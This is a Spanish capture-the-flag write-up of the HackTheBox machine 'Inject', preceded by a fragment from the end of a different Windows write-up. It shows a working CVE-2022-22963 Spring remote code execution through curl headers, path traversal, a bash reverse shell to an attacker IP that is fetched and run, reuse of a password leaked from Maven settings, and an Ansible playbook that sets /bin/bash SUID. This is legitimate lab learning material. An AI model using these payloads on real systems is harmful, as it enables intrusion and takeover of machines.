Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Conclusión

Maquina muy interesante, de hecho la primera maquina windows que hago writeup, nunca viene mal practicar hacking win. Se puede hacer de muchas maneras el dumpeo de hashes. Les recomiend que investigen otras formas, van aprender mucho.

Skills

- Paht Traversal -> LFI - Local File Inclusion

- CVE-2022-22963 -> RCE - Remote Code Execution

- Information leakage -> User Pivoting

- Abusing cron tab -> Privilage Escalation

Reconocimiento

Comenzamos creando nuestros directorios para realizar un reconocimiento

$ mkdir Inject-10.10.11.204
$ cd Inject-10.10.11.204
$ mkdir nmap content exploit

Luego procedemos a realizar un escaneo con nmap

$ nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.204 -oG allPorts

Yo lo exporto en formato grepeable por que tengo una función llamada extractPorts -> (link de la utilidad de extractPorts creada por s4vitar, instalar xclip)

$ extractPorts allPorts

[*] Extracting information...

    [*] IP Address: 10.10.11.204
    [*] Open ports: 22,8080

[*] Ports copied to clipboard

Vamos a realizar un escaneo mas exhaustivo sobre esos puertos

$ nmap -sCV -p22,8080 10.10.11.204 -oN targeted

Nmap scan report for 10.10.11.204
Host is up (0.21s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
|   256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_  256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp open  nagios-nsca Nagios NSCA
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/

Vemos una pagina web en el puerto 8080 vamos a realizar un escaneo para ver las tecnologías y cms que usa la web. Para esto vamos a lanzar un whatweb sobre este puerto

$ whatweb http://10.10.11.204:8080

http://10.10.11.204:8080 [200 OK] Bootstrap, Content-Language[en-US], Country[RESERVED][ZZ], Frame, HTML5, IP[10.10.11.204], Title[Home], YouTube

No nos reporta nada de relevancia, vamos a ver como se ve la web

Vemos un servicio de almacenamiento en la nube, donde nos ofrecen ciertos planes, etc. Vemos un Log in y un Sing up pero no están del todo funcional, pero vemos un upload vamos a revisar esto

Vemos que podemos subir un archivo, eso es peligroso ya que podríamos llegar a ejecutar comandos en la maquina. Vamos a intentar subir un .txt para ver la respuesta del lado del servidor

Vemos que solo nos acepta extensiones de tipo imágenes, podemos probar ciertas técnicas para intentar subir un archivo con la extension que nos interese, pero antes vamos a subir una imagen primero, para ver la respuesta en la web

Vemos que nos subió la imagen, y nos muestra la ruta en la que este se aloja. Esto es importante, ya que si subimos un archivo malicioso necesitamos saber donde se almacena para poder apuntar a este y poder usarlo. Vamos a revisar la ruta

Y ahí esta el gato.jpg(Saludos a gato gamer, de la comunidad de hack4u. Un máquina) vemos una función "show_image?img=gato.jpg" Probando no nos deja subir otra extension que no sea una imagen. Pero vamos a pasar la petición por burpsuite para ver como se esta tramitando

Vemos la función show_image vamos a intentar un directory path traversal, para comprobar si podemos listar archivos del lado de la maquina victima

Y como podemos observar se acontece el directory path traversal, vamos a ver la rute "/var/www" que es donde probablemente este montada la pagina

Y vemos un html y un WebApp vamos a enumerar este ultimo

Y vemos varios directorio y archivos. Enumerando nos encontramos algo curioso en el archivo pom.xml

Vemos algo llamado, spring-framework v2.6.5. Investigando esto es vulnerable a CVE-2022-22963 Esto los que nos permite es ejecutar comandos deforma remota mediante una secuencia de peticiones HTTP específicas. (Para mas info les comparto un link donde pueden leer mas acerca de esto -> CVE-2020-22963 )

$ curl -X POST http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/dh-pwnd")' --data-raw 'data' -v

Note: Unnecessary use of -X or --request, POST is already inferred.
*   Trying 10.10.11.204:8080...
* Connected to 10.10.11.204 (10.10.11.204) port 8080 (#0)
> POST /functionRouter HTTP/1.1
> Host: 10.10.11.204:8080
> User-Agent: curl/7.88.1
> Accept: */*
> spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/dh-pwnd")
> Content-Length: 4
> Content-Type: application/x-www-form-urlencoded
> 
< HTTP/1.1 500 
< Content-Type: application/json
< Transfer-Encoding: chunked
< Date: Tue, 18 Jul 2023 20:25:56 GMT
< Connection: close
< 
* Closing connection 0
{"timestamp":"2023-07-18T20:25:56.636+00:00","status":500,"error":"Internal Server Error","message":"EL1001E: Type conversion problem, cannot convert from java.lang.ProcessImpl to java.lang.String","path":"/functionRouter"}

Vamos a listar si nos creo el archivo dh-pwnd en "/tpm"

Y como podemos observar, nos logramos crear un archivo en "/tmp" por tanto tenemos ejecución de comandos de forma remota. Vamos a intentar ganar acceso a la maquina

$ cd ../exploit
$ cat reverse.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.215/443 0>&1

Vamos a poner montar un servidor con python, para hacerle un curl del lado de la maquina victima y depositar lo en la maquina victima para luego ejecutarlo y ganar acceso a la maquina. En una consola hacemos lo siguiente:

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Y en otra nos ponemos en escucha con nc

$ nc -nlvp 443
listening on [any] 443 ...

Ahora depositamos el reverse.sh en la maquina victima

$ curl -X POST http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl http://10.10.14.215/reverse.sh -o /tmp/reverse.sh")' --data-raw 'data' -v

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.204 - - [18/Jul/2023 12:47:27] "GET /reverse.sh HTTP/1.1" 200 -

Y lo ejecutamos con bash

$ curl -X POST http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash /tmp/reverse.sh")' --data-raw 'data' -v

listening on [any] 443 ...
connect to [10.10.14.215] from (UNKNOWN) [10.10.11.204] 37208
bash: cannot set terminal process group (817): Inappropriate ioctl for device
bash: no job control in this shell
frank@inject:/$

Y ganamos acceso a la maquina victima(No realizo tratamiento de la tty ya que me dio mas problemas, ustedes lo pueden intentar. Si voy a definir algunas variables de entorno)

frank@inject:/$ export SHELL=bash
frank@inject:/$ export TERM=xterm

User Pivoting

Enumerando el directorio de frank nos encontramos algo raro

frank@inject:/$ cd
frank@inject:~$ ls -la

total 28
drwxr-xr-x 5 frank frank 4096 Feb  1 18:38 .
drwxr-xr-x 4 root  root  4096 Feb  1 18:38 ..
lrwxrwxrwx 1 root  root     9 Jan 24 13:57 .bash_history -> /dev/null
-rw-r--r-- 1 frank frank 3786 Apr 18  2022 .bashrc
drwx------ 2 frank frank 4096 Feb  1 18:38 .cache
drwxr-xr-x 3 frank frank 4096 Feb  1 18:38 .local
drwx------ 2 frank frank 4096 Feb  1 18:38 .m2
-rw-r--r-- 1 frank frank  807 Feb 25  2020 .profile

Vemos un directorio .m2 vamos a revisar su contenido

frank@inject:~$ cd .m2
frank@inject:~/.m2$ ls
settings.xml
frank@inject:~/.m2$ cat settings.xml

cat settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>

vemos la contrasena de phil vamos a probar si es correcta

frank@inject:~/.m2$ su phil
Password: DocPhillovestoInject123
whoami
phil

Y ahora somos logramos convertirnos en el usuario phil(vuelvo a definir algunas variables de entorno)

$ script /dev/null -c bash
phil@inject:/home/frank/.m2$ export TERM=xterm
phil@inject:/home/frank/.m2$ export SHELL=bash

Escalada de privilegios

Vamos a transferirnos el pspy para mirar por tareas que se estén ejecutando a intervalos regulares de tiempo(link al proyecto de github de pspy -> pspy) Descargar el pspy64 de los releases y luego nos creamos un servidor local con python

$ cd ../content
$ mv /home/dh89/Download/pspy64 .
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Nos lo descargamos en la maquina victima

phil@inject:/home/frank/.m2$ cd /tmp
phil@inject:/tmp$ wget http://10.10.14.215/pspy64

--2023-07-18 21:19:37--  http://10.10.14.215/pspy64
Connecting to 10.10.14.215:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64              100%[===================>]   2.96M   452KB/s    in 7.7s    

2023-07-18 21:19:46 (396 KB/s) - ‘pspy64’ saved [3104768/3104768]

Le damos permisos de ejecución y lo ejecutamos

phil@inject:/tmp$ chmod +x pspy64
phil@inject:/tmp$ ./pspy64

Luego de un rato vemos una linea como esta

2023/07/18 21:22:01 CMD: UID=0     PID=58046  | /bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml

Donde están ejecutando con asible-parallel cualquier archivo .yml en la ruta "/opt/automation/tasks", por tanto vamos a crear un archivo .yml malicioso para por ejemplo, asignarle el permiso SUID a la bash con el siguiente contenido(Esto lo hacemos en nuestra maquina y luego lo pasamos a la maquina victima)(Si perdeis acceso a la maquina, simplemene realizar los pasos anteriores y ganar otra consola, ya que el reverse.sh esta en "/tmp")

- hosts: localhost
  tasks:
    - name: pwned
      ansible.builtin.shell: |
        chmod +s /bin/bash
      become: true

Yo lo guardo en pwned.yml por tanto

$ pyton3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

phil@inject:/$ cd /tmp 
phil@inject:/tmp$ wget http://10.10.14.215/pwned.yml                                
--2023-07-18 21:32:56--  http://10.10.14.215/pwned.yml
Connecting to 10.10.14.215:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 123 [application/octet-stream]
Saving to: ‘pwned.yml’

pwned.yml           100%[===================>]     123  --.-KB/s    in 0s      

2023-07-18 21:32:57 (9.67 MB/s) - ‘pwned.yml’ saved [123/123]

Y lo depositamos en el directorio "/opt/automation/tasks"

phil@inject:/tmp$ mv pwned.yml /opt/automation/tasks

Y ahora toca esperar un rato, hasta que la bash tenga permisos SUID

phil@inject:/tmp$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash
phil@inject:/tmp$ bash -p
bash-5.0# whoami
root

Y maquina finalizada

Conclusión

Maquina de htb bastante interesante, donde vemos un cve curioso y abusando de tareas cron. Espero que les sirva la guia y cualquier consulta tienen los comentarios o pueden contactarme por discord